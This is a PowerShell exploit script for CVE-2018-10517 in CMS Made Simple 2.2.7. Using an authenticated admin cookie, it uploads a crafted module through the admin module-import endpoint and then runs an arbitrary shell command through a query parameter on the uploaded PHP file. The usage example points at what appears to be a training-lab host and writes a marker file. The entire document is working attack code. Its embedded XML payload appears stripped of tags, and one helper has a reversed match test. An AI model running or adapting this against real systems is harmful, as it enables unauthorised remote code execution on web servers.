<# .SYNOPSIS This exploit script leverages Remote command execution in CMS Made Simple 2.2.7 .EXAMPLE Executes "echo zc00l > /var/www/html/pwned.txt" on the remote server. Invoke-CVE-2018-10517 -URL "http://vtg251cbtepn9e3blg2a3vud1.public1.attackdefenselabs.com" -Cookie "CMSSESSID2543746e82b0=q30ra18tppht2cv5ge0abnill2; 9e64ffa8dbc0989a27514765a68a50028e0ed1f8=cc1dda892c8bc22818637503fb65f3549852e689%3A%3AeyJ1aWQiOjEsInVzZXJuYW1lIjoicGVudGVzdGVyIiwiZWZmX3VpZCI6bnVsbCwiZWZmX3VzZXJuYW1lIjpudWxsLCJoYXNoIjoiJDJ5JDEwJG42eVpRWnpXc2loVTZHRWZoenVnRWV2bTY4alwvSzV5ei5mNGg4anpJcWx0Y3o4U01NdXBlTyJ9; __c=a6dc9cdd74624799dba" -Command "echo zc00l > /var/www/html/pwned.txt" #> function Invoke-CVE-2018-10517 { Param( [Parameter(Mandatory = $true, Position = 0)] [string]$URL, [Parameter(Mandatory = $true, Position = 1)] [string]$Cookie, [Parameter(Mandatory = $true, Position = 2)] [string]$Command, [Parameter(Mandatory = $false, Position = 3)] [string]$ModuleName="exploit" ) $WebSession = New-Object Microsoft.PowerShell.Commands.WebRequestSession # Splits cookie data by delimiter ; (which is default in browsers) foreach($CookieData in $Cookie.Split(";")) { $TupleData = $CookieData.Split("=") if($TupleData.Length -le 1) { Write-Error "Invalid cookie detected." Continue } $CookieName = $TupleData[0].Replace(" ", "") $CookieValue = $TupleData[1] $CookieObj = New-Object System.Net.Cookie $CookieObj.Name = $CookieName $CookieObj.Value = $CookieValue $CookieObj.Domain = (Remove-Scheme $URL) $WebSession.Cookies.Add($CookieObj) Write-Output "Cookie $CookieName was added to session." } $Headers = @{ "User-Agent" = "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0" "Accept" = "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8" "Accept-Language" = "en-US,en;q=0.5" "Accept-Encoding" = "gzip, deflate" "Referer" = "$URL" "Content-Type" = "multipart/form-data; boundary=---------------------------429786310683" "Upgrade-Insecure-Requests" = "1" } $Payload = @" -----------------------------429786310683 Content-Disposition: form-data; name="mact" ModuleManager,m1_,local_import,0 -----------------------------429786310683 Content-Disposition: form-data; name="__c" a6dc9cdd74624799dba -----------------------------429786310683 Content-Disposition: form-data; name="m1_upload"; filename="$ModuleName.xml" Content-Type: text/xml 1.3 AndreMarques 1.0 1.11 / 1 /$ModuleName.php 0 -----------------------------429786310683-- "@ Write-Output "Trying to install exploit module over CMS Made Simple ..." $Response = Invoke-WebRequest -Method "POST" -URI "$URL/admin/moduleinterface.php" -WebSession $WebSession -Body $Payload -Headers $Headers if($Response.Content -Match "Module imported") { Write-Output "Exploit module has been uploaded and processed." } else { Write-Error "Exploit module has not been installed." return } Write-Output "Trying to trigger command execution ..." $StatusCode = (Invoke-WebRequest -Method "GET" -URI "$URL/modules/AndreMarques/$ModuleName.php?c=$Command").StatusCode if($StatusCode -eq 200) { Write-Output "Command has been executed." } else { Write-Error "Command has not been executed." } return } function Remove-Scheme { Param( [Parameter(Mandatory = $true, Position = 0)] [string]$URI ) if("https://" -match $URI) { return $URI.Replace("https://", "" ) } else { return $URI.Replace("http://", "" ) } }